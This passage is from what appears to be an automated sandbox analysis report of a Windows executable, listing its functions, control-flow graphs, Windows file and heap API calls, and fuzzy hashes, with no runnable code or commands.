                                                              • Instruction Fuzzy Hash: 17116D31721B4086EF159F27A9843A967A1FB8CFC0F481029EF4E4B7A5DE39C8528340
                                                              Function 0000000140001E57 Relevance: 9.3, APIs: 6, Instructions: 259COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 4232179356-0
                                                              • Opcode ID: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction ID: 2ef6d83f5e2b3c8fb19d65fceeff62dc40447b47a2c1a218917e14d6a90cbc88
                                                              • Opcode Fuzzy Hash: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction Fuzzy Hash: E38162FBE69644E5EA07B763BC86BED5220D3AD3D4F504410FF08062A3EE3995E64B10
                                                              Function 000000014000DE50 Relevance: 9.2, APIs: 6, Instructions: 151filememoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 94 14000de50-14000de9e call 1400112a8 97 14000dea4-14000deb4 94->97 98 14000e098-14000e09b 94->98 100 14000deb6-14000dec7 97->100 101 14000defb-14000defe 97->101 99 14000e07f-14000e097 98->99 102 14000dec9 100->102 103 14000decd-14000def6 CreateFileW 100->103 104 14000df42-14000df46 101->104 105 14000df00-14000df11 101->105 102->103 106 14000dfbc-14000dfc0 103->106 109 14000dfb7 104->109 110 14000df48-14000df59 104->110 107 14000df13 105->107 108 14000df17-14000df40 CreateFileW 105->108 113 14000dfc6-14000dfc9 106->113 114 14000e05d-14000e06f call 1400111dc 106->114 107->108 108->106 109->106 111 14000df5b 110->111 112 14000df5f-14000df8b CreateFileW 110->112 111->112 112->113 115 14000df8d-14000dfb5 CreateFileW 112->115 113->114 116 14000dfcf-14000dfd8 113->116 118 14000e074-14000e07c 114->118 115->106 119 14000dff9 116->119 120 14000dfda-14000dfdf 116->120 118->99 122 14000dffd-14000e02d 119->122 120->119 121 14000dfe1-14000dff7 HeapAlloc 120->121 121->122 123 14000e04d-14000e05b 122->123 124 14000e02f-14000e034 122->124 123->114 123->118 124->123 125 14000e036-14000e047 SetFilePointer 124->125 125->123
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
                                                              • String ID:
                                                              • API String ID: 2685021396-0
                                                              • Opcode ID: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction ID: 9fd7d13fb8664e67d48ce56ae15862c74b29b4b7423edb5d501112f331116329
                                                              • Opcode Fuzzy Hash: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction Fuzzy Hash: 2B51D4B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10
                                                              Function 000000014000593C Relevance: 7.0, APIs: 4, Instructions: 980COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 126 14000593c-14000593e 127 140005945-140005954 126->127 127->127 128 140005956-140005979 call 1400123e0 127->128 131 14000597b-140005987 128->131 132 140005a39-140005a53 131->132 133 14000598d-140005a33 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 131->133 135 140005a55-140005a61 132->135 133->131 133->132 137 140005b13-140005b2d 135->137 138 140005a67-140005b0d call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 135->138 141 140005b2f-140005b3b 137->141 138->135 138->137 144 140005b41-140005be7 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 141->144 145 140005bed-140005c07 141->145 144->141 144->145 149 140005c09-140005c15 145->149 153 140005cc7-140005ce1 149->153 154 140005c1b-140005cc1 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 149->154 159 140005ce3-140005cef 153->159 154->149 154->153 160 140005da1-140005dbb 159->160 161 140005cf5-140005d91 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 159->161 168 140005dbd-140005dc9 160->168 284 140005d96-140005d9b 161->284 175 140005e7f-140005e99 168->175 176 140005dcf-140005e79 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 168->176 184 140005e9b-140005ea7 175->184 176->168 176->175 192 140005f5d-140005f77 184->192 193 140005ead-140005f57 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 184->193 201 140005f79-140005f85 192->201 193->184 193->192 209 14000603b-140006055 201->209 210 140005f8b-140006035 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 201->210 219 140006057-140006063 209->219 210->201 210->209 228 140006119-14000657b call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400047e2 call 140012210 call 14000c2bc GetModuleHandleW call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 140004134 call 1400121c0 * 2 call 140002c46 call 140006a58 call 140001e57 call 1400067aa call 1400121c0 * 2 call 14000ca70 call 1400049ea call 140012210 PathRemoveBackslashW call 140002bab call 1400121c0 * 3 call 140003cc9 call 140012520 call 1400125d0 call 14000c45c call 140006a58 call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400026bb call 140012210 call 140004ee2 call 1400121c0 call 140012450 call 140012210 PathQuoteSpacesW call 1400121c0 call 140012450 * 3 call 140012210 PathQuoteSpacesW 219->228 229 140006069-140006113 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 219->229 428 1400065a1-1400065a6 call 140003ddc 228->428 429 14000657d-14000659f call 140007284 228->429 229->219 229->228 284->159 284->160 432 1400065ab-1400067a9 call 1400121c0 * 2 call 140012450 * 3 call 140012520 call 1400121c0 * 2 call 14000daa8 call 140012520 call 1400121c0 call 140012450 * 2 call 1400125d0 * 3 call 1400029c8 call 140006a58 call 140002930 call 140012360 * 10 428->432 429->432
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
                                                              • String ID:
                                                              • API String ID: 2499486723-0
                                                              • Opcode ID: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction ID: 5e2f233be3bb1e1a489454234068146e28d45b36aeb09ace1181e30b51997f55
                                                              • Opcode Fuzzy Hash: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction Fuzzy Hash: 6C722BB6E25548D6EA16B7B7B8877E95220A3AD394F500411FF4C0B363EE39C5F64B10
                                                              Function 000000014000E620 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FilePointermemmove
                                                              • String ID:
                                                              • API String ID: 2366752189-0
                                                              • Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
                                                              • Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50
                                                              Function 000000014000E3F0 Relevance: 4.6, APIs: 3, Instructions: 67filememoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 509 14000e3f0-14000e404 510 14000e4f3-14000e4fd 509->510 511 14000e40a-14000e40e 509->511 511->510 512 14000e414-14000e418 511->512 513 14000e483-14000e4a6 call 14000e770 512->513 514 14000e41a-14000e423 512->514 521 14000e4a8-14000e4b5 513->521 522 14000e4ee 513->522 516 14000e451-14000e45b 514->516 517 14000e425 514->517 516->516 518 14000e45d-14000e482 WriteFile 516->518 520 14000e430-14000e43a 517->520 520->520 523 14000e43c-14000e450 call 14000e620 520->523 524 14000e4c5-14000e4d6 WriteFile 521->524 525 14000e4b7-14000e4ba call 14000e620 521->525 522->510 528 14000e4dc-14000e4e8 HeapFree 524->528 530 14000e4bf-14000e4c3 525->530 528->522 530->528
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$FreeHeap
                                                              • String ID:
                                                              • API String ID: 74418370-0
                                                              • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                              • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
                                                              • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                              • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00
                                                              Function 000000014000E770 Relevance: 4.6, APIs: 3, Instructions: 51memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 531 14000e770-14000e7b7 WideCharToMultiByte 532 14000e7b9-14000e7d6 HeapAlloc 531->532 533 14000e81f-14000e822 531->533 534 14000e804 532->534 535 14000e7d8-14000e801 WideCharToMultiByte 532->535 536 14000e809-14000e81e 533->536 534->536 535->534
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocHeap
                                                              • String ID:
                                                              • API String ID: 3475569825-0
                                                              • Opcode ID: 49eb562b8cb434ff95f7e7d63f5ecf434c56baadcc58e4f799a86c336de5446e
                                                              • Instruction ID: ae5164d7e213c5423ce426761272d4060c1fe25f0e8d52ef4d31f29a04fa76ea
                                                              • Opcode Fuzzy Hash: 49eb562b8cb434ff95f7e7d63f5ecf434c56baadcc58e4f799a86c336de5446e
                                                              • Instruction Fuzzy Hash: D9112B72615B8082E754DF26B84435AB7A5FBC8BD0F148228EF9D63BA4DF38C5229704
                                                              Function 000000014000D914 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 537 14000d914-14000d922 538 14000d924-14000d95a wcsncpy wcslen 537->538 539 14000d99e 537->539 540 14000d98a-14000d99c CreateDirectoryW 538->540 541 14000d95c-14000d96b 538->541 542 14000d9a0-14000d9a8 539->542 540->542 541->540 543 14000d96d-14000d97b 541->543 543->540 544 14000d97d-14000d988 543->544 544->540 544->541
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectorywcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 961886536-0
                                                              • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                              • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
                                                              • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                              • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14
                                                              Function 000000014000B538 Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 545 14000b538-14000b573 memset InitCommonControlsEx CoInitialize
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CommonControlsInitInitializememset
                                                              • String ID:
                                                              • API String ID: 2179856907-0
                                                              • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                              • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
                                                              • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                              • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00
                                                              Function 0000000140012210 Relevance: 3.8, APIs: 3, Instructions: 51memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$Value
                                                              • String ID:
                                                              • API String ID: 3898337583-0
                                                              • Opcode ID: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                              • Instruction ID: 13d1d2221b5dfffbe944c94766c5cf34ad854dcf92a9a233d77868c63a58341b
                                                              • Opcode Fuzzy Hash: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                              • Instruction Fuzzy Hash: BA21A336609B40C6DA21CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00
                                                              Function 00000001400029C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CodeExitProcess
                                                              • String ID: open
                                                              • API String ID: 3861947596-2758837156
                                                              • Opcode ID: b7feb277e73c6429ec278226bbe6df587e3a7ad8db4220ec3f4f0566a99c26d5
                                                              • Instruction ID: e85bff13557fc8eee7e7e221a0258bb1a2e766680f88975b06e903b36e14beee
                                                              • Opcode Fuzzy Hash: b7feb277e73c6429ec278226bbe6df587e3a7ad8db4220ec3f4f0566a99c26d5
                                                              • Instruction Fuzzy Hash: 44315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40
                                                              Function 0000000140001000 Relevance: 3.1, APIs: 2, Instructions: 112memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
                                                                • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
                                                                • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
                                                                • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
                                                                • Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
                                                                • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
                                                                • Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491
                                                                • Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
                                                                • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
                                                                • Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
                                                                • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
                                                                • Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
                                                                • Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0
                                                                • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
                                                                • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
                                                                • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
                                                                • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
                                                                • Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266
                                                              • HeapDestroy.KERNEL32 ref: 000000014000124C
                                                              • ExitProcess.KERNEL32 ref: 0000000140001258
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
                                                              • String ID:
                                                              • API String ID: 1207063833-0
                                                              • Opcode ID: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                              • Instruction ID: 5ef5c56730dbad915fac233b77092dd37bc53bc4ec3343fa221c1b372e2f6746
                                                              • Opcode Fuzzy Hash: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                              • Instruction Fuzzy Hash: 9D510AF0A11A4081FA03F7A3F8527E926559B9D7D0F808119BF1D1B3F3DD3A86598B22
                                                              Function 0000000140002930 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8
                                                              • RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
                                                              • RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8
                                                                • Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187
                                                                • Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
                                                                • Part of subcall function 000000014000720C: EnterCriticalSection.KERNEL32 ref: 0000000140007230
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
                                                              • String ID:
                                                              • API String ID: 547990026-0
                                                              • Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                              • Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
                                                              • Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                              • Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610
                                                              Function 000000014000C4D0 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ExceptionHandlerVectored$Remove
                                                              • String ID:
                                                              • API String ID: 3670940754-0
                                                              • Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                              • Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
                                                              • Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                              • Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348
                                                              Function 000000014000DA6C Relevance: 3.0, APIs: 2, Instructions: 19fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 674 14000da6c-14000da80 676 14000da82-14000da85 674->676 677 14000da9f 674->677 679 14000da92-14000da9d DeleteFileW 676->679 680 14000da87-14000da8c SetFileAttributesW 676->680 678 14000daa1-14000daa6 677->678 679->678 680->679
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
